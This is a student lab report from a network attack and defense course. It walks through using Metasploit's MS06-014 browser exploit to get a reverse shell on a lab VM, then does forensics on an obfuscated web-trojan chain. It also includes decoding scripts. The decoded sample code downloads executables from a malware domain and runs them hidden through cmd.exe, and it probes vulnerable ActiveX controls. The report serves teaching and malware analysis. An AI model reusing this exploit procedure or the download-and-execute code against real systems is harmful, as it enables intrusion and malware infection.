20251914 2025-2026-2 Network Attack and Defense Practice, Lab 11 Report
1. Lab content
Part one uses Metasploit's MS06-014 module with a reverse-shell payload: configure the options, generate the malicious page, have the target browser open the link, and obtain a shell on the target. This shows concretely how a drive-by page built on a browser vulnerability leads to remote control.
Part two is web-trojan forensics: starting from the entry page, recover the hidden resource URLs step by step. Every downloaded file in the sample set is stored under the lowercase 32-hex-digit MD5 of its URL, so each URL is hashed to locate its file; the script files are decoded layer by layer, and the binaries are examined with a disassembler and a debugger, tracing the whole sample chain back to its source.
Part three is an attack/defense round: the attacker builds exploit pages for two different browser vulnerabilities, obfuscates them and delivers the disguised link by phishing mail; the defender de-obfuscates the page, recovers the original exploit code and pins down which browser version the vulnerability affects. This deepens both exploit-side and malicious-code-analysis skills.
2. Lab procedure
IP addresses:
| VM | IP address |
|---|---|
| Kali | 192.168.232.132 |
| Windows2k | 192.168.232.132 |
Both rows show the same address. Only the Kali address is actually needed in this exercise: the exploit module serves the malicious page from Kali (SRVHOST/SRVPORT) and the reverse-shell payload connects back to LHOST, which must be the Kali address as seen from the target; the target's own address is never entered into the module.
2.1 Web browser exploitation
2.1.1 Start Metasploit with msfconsole.

2.1.2 search MS06-014 finds the matching module (exploit/windows/browser/ie_createobject).

2.1.3 use 0 selects that module; show payloads lists the compatible payloads.

2.1.4 set payload generic/shell_reverse_tcp selects a plain reverse TCP shell as the payload.

2.1.5 The report sets set RHOST 192.168.232.132 for the target and set LHOST 192.168.232.132 for the attacker. ie_createobject is a browser (server-side) module: the victim connects to us, so it has no RHOST option and that line does nothing. The options that matter are SRVHOST/SRVPORT/URIPATH for the malicious web server and LHOST/LPORT for the reverse shell; LHOST must be the Kali address reachable from the target.

2.1.6 exploit starts the server and prints the URL http://192.168.232.132:8080/wsC8HXBzRSKqo (8080 is the default SRVPORT; the path is a random URIPATH).

2.1.7 Open that link in the target's browser (Internet Explorer on the Windows 2000 VM).

2.1.8 Back on the attacker, the payload has connected back: a remote shell now exists between attacker and target.

2.1.9 sessions lists the session.

2.1.10 sessions -i 1 interacts with it; running ipconfig in that shell confirms commands execute on the target.

2.2 Forensic analysis: a web-trojan attack scenario
2.2.1 Open start.html in Mousepad with the GBK encoding and search for new09.htm: the page references new09.htm.

2.2.2 new09.htm is not in the course material on Xuexitong; from the video material its content is inferred to be:
`
`
It references two external resources: http://aa.18dd.net/aa/kl.htm and http://js.users.51.la/1299644.js.
kl.htm is the one to focus on.
It sits under the suspicious domain aa.18dd.net and is loaded through a hidden page, so it most likely carries the exploit or the next stage of the malicious code (the 51.la script is an ordinary visitor-counter service).
2.2.3 To find the corresponding file in the lab's hashed folder, first compute the MD5 of the URL.
The pages and scripts in the sample set are not stored under their original names but under the MD5 hash of the URL they were fetched from.
MD5 of http://aa.18dd.net/aa/kl.htm:
7f60672dcd6b5e90b6772545ee219bd3
So opening the file with that name in the hashed folder is the same as opening kl.htm.
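The URL-to-filename mapping described above, turned into a small tool. This is an added example, not a script from the lab: it computes the hashed name exactly as 2.2.3 describes and goes one step further by walking the reference chain (iframe/script src attributes and bare URLs, including the JS-escaped \/ form seen later in the decoded scripts) through a store of hashed files, reporting which referenced resources the sample set contains. SAMPLE_STORE is constructed here to mirror the new09.htm to kl.htm hop; a real hashed folder is loaded with load_store(). The kl.htm hash is the one quoted in the report; everything else is assumed.

```python
#!/usr/bin/env python3
"""Resolve URLs to the hashed sample folder (filename = MD5 of the URL, lowercase hex)
and walk the reference chain from an entry page."""
import hashlib
import pathlib
import re
import sys
from urllib.parse import urljoin

def hashed_name(url):
    """Filename under which the sample set stores the resource fetched from url."""
    return hashlib.md5(url.encode('utf-8')).hexdigest()

# frame/script src attributes, or any bare URL (catches download links in decoded scripts)
_REF_RE = re.compile(
    r'''<(?:iframe|frame|script)\b[^>]*?\bsrc\s*=\s*["']?([^"'\s>]+)|(https?://[^"'\s<>()]+)''',
    re.I)

def extract_refs(base_url, content):
    """Absolute URLs referenced by content, in order of first appearance, no duplicates."""
    seen, refs = set(), []
    for m in _REF_RE.finditer(content):
        target = (m.group(1) or m.group(2)).replace('\\/', '/')   # undo JS-escaped slashes
        absolute = urljoin(base_url, target)
        if absolute not in seen:
            seen.add(absolute)
            refs.append(absolute)
    return refs

def load_store(hashed_dir):
    """Read every file of a hashed folder into {filename: text}."""
    return {p.name: p.read_text(errors='ignore')
            for p in pathlib.Path(hashed_dir).iterdir() if p.is_file()}

def walk_chain(entry_url, store, max_depth=8):
    """Breadth-first walk.  Returns {url: hashed filename} for every URL reached;
    the value is None when the sample set has no file for that URL."""
    result, queue = {}, [(entry_url, 0)]
    while queue:
        url, depth = queue.pop(0)
        if url in result:
            continue
        content = store.get(hashed_name(url))
        result[url] = hashed_name(url) if content is not None else None
        if content is not None and depth < max_depth:
            queue.extend((ref, depth + 1) for ref in extract_refs(url, content))
    return result

# Constructed stand-in for the sample set: the new09.htm -> kl.htm hop from the report,
# with kl.htm reduced to the document.write() line that loads 1.js.
SAMPLE_STORE = {
    hashed_name('http://aa.18dd.net/aa/new09.htm'):
        '<iframe src="http://aa.18dd.net/aa/kl.htm" width=0 height=0></iframe>\n'
        '<script src="http://js.users.51.la/1299644.js"></script>',
    hashed_name('http://aa.18dd.net/aa/kl.htm'):
        'document.write("<script src=http:\\/\\/aa.18dd.net\\/aa\\/1.js><\\/script>")',
}

if __name__ == '__main__':
    # usage: python3 chain.py <entry-url> [hashed-folder]; without a folder the
    # constructed SAMPLE_STORE is used.
    entry = sys.argv[1] if len(sys.argv) > 1 else 'http://aa.18dd.net/aa/new09.htm'
    store = load_store(sys.argv[2]) if len(sys.argv) > 2 else SAMPLE_STORE
    for url, name in walk_chain(entry, store).items():
        print('%-32s %s' % (name or '(missing from sample set)', url))
```

A URL that maps to no file is reported rather than silently skipped; in this sample set that is exactly what happens for the third-party counter script and for anything that is only named inside shellcode, which the packer/escape decoders in the later steps have to surface first.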

2.2.4 Open 7f60672dcd6b5e90b6772545ee219bd3: the third-to-last line Base64-decodes the payload and then decrypts it with XXTEA.

2.2.5 The second argument of xxtea_decrypt is the key. It is not encrypted, only written as hexadecimal escapes; decoding those (any hex decoder will do) gives script.

2.2.6 Decrypting line 32 of kl.htm with XXTEA and the key script yields:
<script> eval("\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x69\x6e\x69\x74\x28\x29\x7b\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x77\x72\x69\x74\x65\x28\x29\x3b\x7d\x0d\x0a\x77\x69\x6e\x64\x6f\x77\x2e\x6f\x6e\x6c\x6f\x61\x64\x20\x3d\x20\x69\x6e\x69\x74\x3b\x0d\x0a\x69\x66\x28\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x63\x6f\x6f\x6b\x69\x65\x2e\x69\x6e\x64\x65\x78\x4f\x66\x28\x27\x4f\x4b\x27\x29\x3d\x3d\x2d\x31\x29\x7b\x0d\x0a\x74\x72\x79\x7b\x76\x61\x72\x20\x65\x3b\x0d\x0a\x76\x61\x72\x20\x61\x64\x6f\x3d\x28\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74\x28\x22\x6f\x62\x6a\x65\x63\x74\x22\x29\x29\x3b\x0d\x0a\x61\x64\x6f\x2e\x73\x65\x74\x41\x74\x74\x72\x69\x62\x75\x74\x65\x28\x22\x63\x6c\x61\x73\x73\x69\x64\x22\x2c\x22\x63\x6c\x73\x69\x64\x3a\x42\x44\x39\x36\x43\x35\x35\x36\x2d\x36\x35\x41\x33\x2d\x31\x31\x44\x30\x2d\x39\x38\x33\x41\x2d\x30\x30\x43\x30\x34\x46\x43\x32\x39\x45\x33\x36\x22\x29\x3b\x0d\x0a\x76\x61\x72\x20\x61\x73\x3d\x61\x64\x6f\x2e\x63\x72\x65\x61\x74\x65\x6f\x62\x6a\x65\x63\x74\x28\x22\x41\x64\x6f\x64\x62\x2e\x53\x74\x72\x65\x61\x6d\x22\x2c\x22\x22\x29\x7d\x0d\x0a\x63\x61\x74\x63\x68\x28\x65\x29\x7b\x7d\x3b\x0d\x0a\x66\x69\x6e\x61\x6c\x6c\x79\x7b\x0d\x0a\x76\x61\x72\x20\x65\x78\x70\x69\x72\x65\x73\x3d\x6e\x65\x77\x20\x44\x61\x74\x65\x28\x29\x3b\x0d\x0a\x65\x78\x70\x69\x72\x65\x73\x2e\x73\x65\x74\x54\x69\x6d\x65\x28\x65\x78\x70\x69\x72\x65\x73\x2e\x67\x65\x74\x54\x69\x6d\x65\x28\x29\x2b\x32\x34\x2a\x36\x30\x2a\x36\x30\x2a\x31\x30\x30\x30\x29\x3b\x0d\x0a\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x63\x6f\x6f\x6b\x69\x65\x3d\x27\x63\x65\x3d\x77\x69\x6e\x64\x6f\x77\x73\x78\x70\x3b\x70\x61\x74\x68\x3d\x2f\x3b\x65\x78\x70\x69\x72\x65\x73\x3d\x27\x2b\x65\x78\x70\x69\x72\x65\x73\x2e\x74\x6f\x47\x4d\x54\x53\x74\x72\x69\x6e\x67\x28\x29\x3b\x0d\x0a\x69\x66\x28\x65\x21\x3d\x22\x5b\x6f\x62\x6a\x65\x63\x74\x20\x45\x72\x72\x6f\x72\x5d\x22\x29\x7b\x0d\x0a\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x77\x72\x69\x74\x65\x28\x22\x3c\x73\x63\x72\x69\x70\x74\x20\
x73\x72\x63\x3d\x68\x74\x74\x70\x3a\x5c\x2f\x5c\x2f\x61\x61\x2e\x31\x38\x64\x64\x2e\x6e\x65\x74\x5c\x2f\x61\x61\x5c\x2f\x31\x2e\x6a\x73\x3e\x3c\x5c\x2f\x73\x63\x72\x69\x70\x74\x3e\x22\x29\x7d\x0d\x0a\x65\x6c\x73\x65\x7b\x0d\x0a\x74\x72\x79\x7b\x76\x61\x72\x20\x66\x3b\x76\x61\x72\x20\x73\x74\x6f\x72\x6d\x3d\x6e\x65\x77\x20\x41\x63\x74\x69\x76\x65\x58\x4f\x62\x6a\x65\x63\x74\x28\x22\x4d\x50\x53\x2e\x53\x74\x6f\x72\x6d\x50\x6c\x61\x79\x65\x72\x22\x29\x3b\x7d\x0d\x0a\x63\x61\x74\x63\x68\x28\x66\x29\x7b\x7d\x3b\x0d\x0a\x66\x69\x6e\x61\x6c\x6c\x79\x7b\x69\x66\x28\x66\x21\x3d\x22\x5b\x6f\x62\x6a\x65\x63\x74\x20\x45\x72\x72\x6f\x72\x5d\x22\x29\x7b\x0d\x0a\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x77\x72\x69\x74\x65\x28\x22\x3c\x73\x63\x72\x69\x70\x74\x20\x73\x72\x63\x3d\x68\x74\x74\x70\x3a\x5c\x2f\x5c\x2f\x61\x61\x2e\x31\x38\x64\x64\x2e\x6e\x65\x74\x5c\x2f\x61\x61\x5c\x2f\x62\x2e\x6a\x73\x3e\x3c\x5c\x2f\x73\x63\x72\x69\x70\x74\x3e\x22\x29\x7d\x7d\x0d\x0a\x74\x72\x79\x7b\x76\x61\x72\x20\x67\x3b\x76\x61\x72\x20\x70\x70\x73\x3d\x6e\x65\x77\x20\x41\x63\x74\x69\x76\x65\x58\x4f\x62\x6a\x65\x63\x74\x28\x22\x50\x4f\x57\x45\x52\x50\x4c\x41\x59\x45\x52\x2e\x50\x6f\x77\x65\x72\x50\x6c\x61\x79\x65\x72\x43\x74\x72\x6c\x2e\x31\x22\x29\x3b\x7d\x0d\x0a\x63\x61\x74\x63\x68\x28\x67\x29\x7b\x7d\x3b\x0d\x0a\x66\x69\x6e\x61\x6c\x6c\x79\x7b\x69\x66\x28\x67\x21\x3d\x22\x5b\x6f\x62\x6a\x65\x63\x74\x20\x45\x72\x72\x6f\x72\x5d\x22\x29\x7b\x0d\x0a\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x77\x72\x69\x74\x65\x28\x22\x3c\x73\x63\x72\x69\x70\x74\x20\x73\x72\x63\x3d\x68\x74\x74\x70\x3a\x5c\x2f\x5c\x2f\x61\x61\x2e\x31\x38\x64\x64\x2e\x6e\x65\x74\x5c\x2f\x61\x61\x5c\x2f\x70\x70\x73\x2e\x6a\x73\x3e\x3c\x5c\x2f\x73\x63\x72\x69\x70\x74\x3e\x22\x29\x7d\x7d\x0d\x0a\x74\x72\x79\x7b\x76\x61\x72\x20\x68\x3b\x76\x61\x72\x20\x6f\x62\x6a\x3d\x6e\x65\x77\x20\x41\x63\x74\x69\x76\x65\x58\x4f\x62\x6a\x65\x63\x74\x28\x22\x42\x61\x69\x64\x75\x42\x61\x72\x2e\x54\x6f\x6f\x6c\x22\x29\x3b\x7d\x0d\x0a\x63\x61\x74\x63\x68\x28\x68\x29\x7b\
x7d\x3b\x0d\x0a\x66\x69\x6e\x61\x6c\x6c\x79\x7b\x69\x66\x28\x68\x21\x3d\x22\x5b\x6f\x62\x6a\x65\x63\x74\x20\x45\x72\x72\x6f\x72\x5d\x22\x29\x7b\x0d\x0a\x6f\x62\x6a\x2e\x44\x6c\x6f\x61\x64\x44\x53\x28\x22\x68\x74\x74\x70\x3a\x2f\x2f\x64\x6f\x77\x6e\x2e\x31\x38\x64\x64\x2e\x6e\x65\x74\x2f\x62\x62\x2f\x62\x64\x2e\x63\x61\x62\x22\x2c\x20\x22\x62\x64\x2e\x65\x78\x65\x22\x2c\x20\x30\x29\x7d\x7d\x0d\x0a\x7d\x7d\x7d") </script>

2.2.7 The result is still a JavaScript string made of \x escapes; reversing those escapes with a Python script gives the readable code:
function init(){document.write();}
window.onload = init;
if(document.cookie.indexOf('OK')==-1){
try{var e;
var ado=(document.createElement("object"));
ado.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");
var as=ado.createobject("Adodb.Stream","")}
catch(e){};
finally{
var expires=new Date();
expires.setTime(expires.getTime()+24*60*60*1000);
document.cookie='ce=windowsxp;path=/;expires='+expires.toGMTString();
if(e!="[object Error]"){
document.write("<script src=http:\/\/aa.18dd.net\/aa\/1.js><\/script>")}
else{
try{var f;var storm=new ActiveXObject("MPS.StormPlayer");}
catch(f){};
finally{if(f!="[object Error]"){
document.write("<script src=http:\/\/aa.18dd.net\/aa\/b.js><\/script>")}}
try{var g;var pps=new ActiveXObject("POWERPLAYER.PowerPlayerCtrl.1");}
catch(g){};
finally{if(g!="[object Error]"){
document.write("<script src=http:\/\/aa.18dd.net\/aa\/pps.js><\/script>")}}
try{var h;var obj=new ActiveXObject("BaiduBar.Tool");}
catch(h){};
finally{if(h!="[object Error]"){
obj.DloadDS("http://down.18dd.net/bb/bd.cab", "bd.exe", 0)}}
}}}
2.2.8 Script analysis
The script runs only if document.cookie does not contain 'OK', sets a one-day cookie ce=windowsxp, and then probes the browser for several ActiveX controls: Adodb.Stream, instantiated through the RDS.DataSpace control (classid BD96C556-65A3-11D0-983A-00C04FC29E36, the same MS06-014 CreateObject technique the Metasploit module in 2.1 uses), Storm Player (MPS.StormPlayer), PPStream (POWERPLAYER.PowerPlayerCtrl.1) and the Baidu toolbar (BaiduBar.Tool). Each try/catch decides which next-stage script to load.
Old or vulnerable versions of these components let the page download and run the trojan.
2.2.9 If the Adodb.Stream branch succeeds, the script loads 1.js.
MD5(http://aa.18dd.net/aa/1.js) = 5d7e9058a857aa2abee820d5473c5fa4

2.2.10 Open 5d7e9058a857aa2abee820d5473c5fa4 and reverse its string escapes with the same Python script.


The result:
```javascript
var url="http://down.18dd.net/bb/014.exe";
try{
  var xml=ado.CreateObject("Microsoft.XMLHTTP","");
  xml.Open("GET",url,0);xml.Send();
  as.type=1;as.open();as.write(xml.responseBody);
  path="..\\ntuser.com";as.savetofile(path,2);as.close();
  var shell=ado.createobject("Shell.Application","");
  shell.ShellExecute("cmd.exe","/c "+path,"","open",0)
}catch(e){}
```
The script downloads http://down.18dd.net/bb/014.exe with Microsoft.XMLHTTP, writes the response body to ..\ntuser.com through the Adodb.Stream object (as) that kl.htm created, and runs it with a hidden window via Shell.Application and cmd.exe /c. ado and as are the RDS.DataSpace and Adodb.Stream objects from the kl.htm script, since 1.js is written into the same document; the file name mimics the user profile file ntuser.dat.
2.2.11 MD5(http://aa.18dd.net/aa/b.js) = 3870c28cc279d457746b3796a262f166

The file is obfuscated with the eval(function(p,a,c,k,e,d){...}) packer (Dean Edwards's packer).
A script parses the p, a, c and k arguments and restores the code from the word table, giving readable JavaScript.
The restored script builds shellcode and calls storm.rawParse(buffer), triggering a Storm Player (MPS.StormPlayer) vulnerability.
Decoding the %u-encoded shellcode yields the download URL http://down.18dd.net/bb/bf.exe.
The script used (it also writes the unpacked source and the decoded shellcode to files next to the input):
```python
#!/usr/bin/env python3
"""Unpack a Dean Edwards "p,a,c,k,e,d" JavaScript sample and pull URLs out of the
unpacked code and out of any unescape("%u....") shellcode it builds."""
import re
import sys
import pathlib

path = pathlib.Path(sys.argv[1] if len(sys.argv) > 1 else '/home/kali/Desktop/hashed/3870c28cc279d457746b3796a262f166')
text = path.read_text(errors='ignore')

# Match the packer call used by this sample:
# eval(function(p,a,c,k,e,d){...}('payload',10,196,'sym|tab|...'.split('|'),0,{}))
m = re.search(r"\}\('(?P<p>.*)',\s*(?P<a>\d+),\s*(?P<c>\d+),\s*'(?P<k>.*)'\.split\('\|'\)", text, re.S)
if not m:
    raise SystemExit('packer arguments not found')
payload = m.group('p').replace("\\'", "'")   # the payload is a JS string literal
base = int(m.group('a'))
count = int(m.group('c'))
words = m.group('k').split('|')

ALPHABET = '0123456789abcdefghijklmnopqrstuvwxyz'

def encode_token(c, base):
    """Mirror the packer's e(): how dictionary index c is spelled in the payload.
    base 10 gives plain decimal numbers (this sample); 36/62 give 0-9a-z then A-Z."""
    head = encode_token(c // base, base) if c >= base else ''
    c %= base
    return head + (chr(c + 29) if c > 35 else ALPHABET[c])

# One pass over every \w+ token, like the packer's own unpack loop.  A per-index
# re.sub loop would re-substitute digits inside words that were already restored.
table = {encode_token(i, base): words[i] for i in range(min(count, len(words))) if words[i]}
unpacked = re.sub(r'\b\w+\b', lambda t: table.get(t.group(0), t.group(0)), payload)
out = path.with_name(path.name + '.unpacked.js')
out.write_text(unpacked, encoding='utf-8', errors='ignore')

# Plain URLs in the unpacked source.
urls = set(re.findall(r'https?://[^"\'\s<>]+', unpacked))

def decode_percent_u(s):
    """Decode JS unescape() input: %uXXXX is a UTF-16 code unit (stored little-endian),
    %XX a single byte; anything else is copied through as latin1."""
    data = bytearray()
    i = 0
    while i < len(s):
        if s.startswith('%u', i) and re.match(r'[0-9a-fA-F]{4}', s[i+2:i+6]):
            data += int(s[i+2:i+6], 16).to_bytes(2, 'little')
            i += 6
        elif s.startswith('%', i) and re.match(r'[0-9a-fA-F]{2}', s[i+1:i+3]):
            data.append(int(s[i+1:i+3], 16))
            i += 3
        else:
            data += s[i].encode('latin1', errors='ignore')
            i += 1
    return bytes(data)

# unescape(...) arguments, including concatenations such as unescape("%u..." + "%u...").
shell_parts = []
for expr in re.findall(r'unescape\((.*?)\)', unpacked, re.S):
    pieces = re.findall(r'["\']([^"\']*)["\']', expr, re.S)
    if not pieces:
        continue
    raw = decode_percent_u(''.join(pieces))
    shell_parts.append(raw)
    # The download URL sits inside the shellcode either as plain bytes (visible
    # through a latin1 view) or as UTF-16, so try both.
    for enc in ('latin1', 'utf-16le'):
        urls.update(re.findall(r'https?://[^\x00\s"\'<>]+', raw.decode(enc, errors='ignore')))
shell_path = path.with_name(path.name + '.shellcode.bin')
shell_path.write_bytes(b''.join(shell_parts))

print('input:', path)
print('base/count:', base, count)
print('word-table:', len(words))
print('unpacked:', out, out.stat().st_size, 'bytes')
print('shellcode-bin:', shell_path, shell_path.stat().st_size, 'bytes')
print('urls:')
for u in sorted(urls):
    print('  ' + u)
print('\n--- unpacked head ---')
for n, line in enumerate(unpacked.splitlines()[:80], 1):
    print('{:02d}: {}'.format(n, line[:220]))
```
2.2.12 Analysing 5f0b8bf0385314dbe0e5ec95e6abedc2 (pps.js)
This file hides its code as eval("\ooo...") octal string escapes.
Resolving the octal escapes with a script gives readable JavaScript.
The restored code creates an ActiveX object with classid 5EC7C511-CD0F-42E6-830C-1BD9882F3458 and builds shellcode.
Decoding the %u-encoded shellcode yields the download URL http://down.18dd.net/bb/pps.exe.
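The XXTEA step of 2.2.6 and the string-escape layers of 2.2.7 (\x) and 2.2.12 (octal \ooo) in one added Python helper; this is not part of the report. The word packing, Base64 wrapping and trailing-length word follow the common xxtea.js convention (little-endian 32-bit words, key zero-padded to 16 bytes, plaintext length in the last word); that is an assumption about this sample, so a wrong key or a different variant is reported through the length check instead of returning garbage. js_unescape resolves \xNN, \uNNNN, octal \NNN and single-character escapes in a single pass, which is why a \x5c\x2f pair becomes the two characters \/ exactly as in the output shown in 2.2.7. SAMPLE_EVAL is a constructed, shortened stand-in for the decrypted kl.htm line.

```python
#!/usr/bin/env python3
"""XXTEA+Base64 decryption (kl.htm, key "script") and JavaScript string-escape
decoding for the eval("\\x..") and eval("\\ooo") layers that follow it."""
import base64
import re
import sys

DELTA, MASK = 0x9E3779B9, 0xFFFFFFFF

def _mx(total, y, z, p, e, k):
    return ((((z >> 5) ^ ((y << 2) & MASK)) + ((y >> 3) ^ ((z << 4) & MASK)))
            ^ ((total ^ y) + (k[(p & 3) ^ e] ^ z)))

def btea_encrypt(v, k):
    """Corrected Block TEA on a list of 32-bit words with a 4-word key."""
    v, n = list(v), len(v)
    if n < 2:                      # the reference code leaves 0/1-word inputs untouched
        return v
    rounds, total, z = 6 + 52 // n, 0, v[n - 1]
    for _ in range(rounds):
        total = (total + DELTA) & MASK
        e = (total >> 2) & 3
        for p in range(n - 1):
            y = v[p + 1]
            z = v[p] = (v[p] + _mx(total, y, z, p, e, k)) & MASK
        y = v[0]
        z = v[n - 1] = (v[n - 1] + _mx(total, y, z, n - 1, e, k)) & MASK
    return v

def btea_decrypt(v, k):
    v, n = list(v), len(v)
    if n < 2:
        return v
    rounds = 6 + 52 // n
    total, y = (rounds * DELTA) & MASK, v[0]
    for _ in range(rounds):
        e = (total >> 2) & 3
        for p in range(n - 1, 0, -1):
            z = v[p - 1]
            y = v[p] = (v[p] - _mx(total, y, z, p, e, k)) & MASK
        z = v[n - 1]
        y = v[0] = (v[0] - _mx(total, y, z, 0, e, k)) & MASK
        total = (total - DELTA) & MASK
    return v

# xxtea.js convention (assumed for this sample): little-endian 4-byte words, key
# zero-padded to 16 bytes, plaintext length stored in a trailing word.
def _to_words(data, with_length):
    words = [int.from_bytes(data[i:i + 4].ljust(4, b'\0'), 'little')
             for i in range(0, len(data), 4)]
    return words + [len(data)] if with_length else words

def _from_words(words):
    return b''.join(w.to_bytes(4, 'little') for w in words)

def _key_words(key):
    return _to_words(key.encode('latin1')[:16].ljust(16, b'\0'), False)

def xxtea_encrypt(plaintext, key):
    return base64.b64encode(_from_words(btea_encrypt(_to_words(plaintext, True), _key_words(key)))).decode('ascii')

def xxtea_decrypt(b64_ciphertext, key):
    """Returns plaintext bytes.  A wrong key or a different xxtea variant shows up as an
    implausible trailing length word and raises ValueError instead of returning garbage."""
    words = btea_decrypt(_to_words(base64.b64decode(b64_ciphertext), False), _key_words(key))
    if not words:
        return b''
    n, limit = words[-1], (len(words) - 1) * 4
    if n < limit - 3 or n > limit:
        raise ValueError('implausible plaintext length %d: wrong key or format' % n)
    return _from_words(words[:-1])[:n]

_JS_ESC = re.compile(r'\\(x[0-9a-fA-F]{2}|u[0-9a-fA-F]{4}|[0-7]{1,3}|.)', re.S)
_SIMPLE = {'n': '\n', 'r': '\r', 't': '\t', 'b': '\b', 'f': '\f', 'v': '\v'}

def js_unescape(s):
    """One pass over \\xNN, \\uNNNN, octal \\NNN and single-char escapes, as the JS
    engine does before eval() runs: \\/ becomes /, and \\x5c\\x2f becomes the two chars \\/."""
    def one(m):
        esc = m.group(1)
        if esc[0] in 'xu' and len(esc) > 1:
            return chr(int(esc[1:], 16))
        if esc[0] in '01234567':
            return chr(int(esc, 8))
        return _SIMPLE.get(esc, esc)
    return _JS_ESC.sub(one, s)

def eval_string_argument(js):
    """Unescaped argument of the first eval("...") call in js, or None."""
    m = re.search(r'eval\(\s*"((?:[^"\\]|\\.)*)"\s*\)', js, re.S)
    return js_unescape(m.group(1)) if m else None

# Constructed, shortened stand-in for the decrypted kl.htm line shown in 2.2.6.
SAMPLE_EVAL = (r'<script> eval("\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x69\x6e\x69\x74\x28\x29\x7b\x7d\x0d\x0a'
               r'\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x77\x72\x69\x74\x65\x28\x22\x3c\x73\x63\x72\x69\x70\x74'
               r'\x20\x73\x72\x63\x3d\x68\x74\x74\x70\x3a\x5c\x2f\x5c\x2f\x61\x61\x2e\x31\x38\x64\x64\x2e\x6e'
               r'\x65\x74\x5c\x2f\x61\x61\x5c\x2f\x31\x2e\x6a\x73\x3e\x3c\x5c\x2f\x73\x63\x72\x69\x70\x74\x3e'
               r'\x22\x29") </script>')

if __name__ == '__main__':
    # usage: xxtea_layers.py <file holding base64 ciphertext> <key>
    #    or: xxtea_layers.py <file holding an eval("...") string>
    data = open(sys.argv[1], 'rb').read().strip() if len(sys.argv) > 1 else SAMPLE_EVAL.encode()
    if len(sys.argv) > 2:
        data = xxtea_decrypt(data, sys.argv[2])
    text = data.decode('latin1')
    print(eval_string_argument(text) or text)
```

Because the unescape is single-pass, escapes that the decoded text itself still carries (the \/ in the document.write strings) survive as written, which matches what 2.2.7 shows and is what the next document.write would hand to the browser; run js_unescape again only when another eval layer follows.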

2.2.13 MD5(http://down.18dd.net/bb/bd.cab) = 1c1d7b3539a617517c49eee4120783b2
It is a CAB archive; extracting it yields one executable, bd.exe.

2.2.14 Computing the MD5 of the four downloaded executables shows they are identical, so only one of them needs to be analysed:
| File | URL MD5 (hashed filename) | File MD5 |
|---|---|---|
| 014.exe | ca4e4a1730b0f69a9b94393d9443b979 | 1290ecd734d68d52318ea9016dc6fe63 |
| bf.exe | 268cbd59fbed235f6cf6b41b92b03f8e | 1290ecd734d68d52318ea9016dc6fe63 |
| pps.exe | ff59b3b8961f502289c1b4df8c37e2a4 | 1290ecd734d68d52318ea9016dc6fe63 |
| bd.exe | 994f7810e6a461292cc337bf73981e2c | 1290ecd734d68d52318ea9016dc6fe63 |
2.2.15 Open bd.exe
Using the radare2 shipped with Kali: r2 /home/kali/Desktop/1c1d7b3539a617517c49eee4120783b2_extracted/bd.exe
then izz lists the strings in the whole binary; among them are further download URLs, so the dropper goes on to fetch many other files. This is static inspection only: the sample is never executed outside an isolated VM.

2.3 Attack/defense exercise: web browser exploitation
2.3.1 Attacker
Generate the attack URL the same way as in 2.1.


2.3.2 Defender
2.3.2.1 Visit http://192.168.232.132:8080/jX7x25DNvN from the target and view the page source: most of it is whitespace padding.

2.3.2.2 Running the source through an HTML minifier makes it readable:

The whole HTML consists of three core functions plus an onload trigger, with no normal page content:
BSjZplMwvWfweJYkOd: exploit helper, tries several ways of creating a COM object (a system component)
yifpoGHRYzhIwfmAxvQacKLXvsrLxHM: core attack function, downloads, saves and runs the malicious program
KlEOOdhhEZzBHg: entry function, iterates over the vulnerable CLSIDs and triggers the attack
2.3.2.3 The classid BD96C556-65A3-11D0-983A-00C04FC29E36 in the page is RDS.DataSpace, the MDAC control abused by MS06-014; that identifies the page as the MS06-014 exploit from 2.1.

3. Problems encountered and solutions
- Problem 1: after hex-decoding, the code still contained many \x sequences.
- Solution: this is not plain hexadecimal encoding but JavaScript string escaping; the escapes were reversed with the Python script described above.
4. Summary
This lab shows that a web trojan rarely relies on a single file: multiple redirections, script obfuscation, vulnerability probing and malware downloads together form the full attack chain. Such samples should be traced layer by layer in the order entry page -> external scripts -> de-obfuscation -> shellcode -> downloaded files. It also made clear that static analysis must not run the malicious program; strings, file, md5sum, radare2 and custom decoding scripts are the safe first choice.
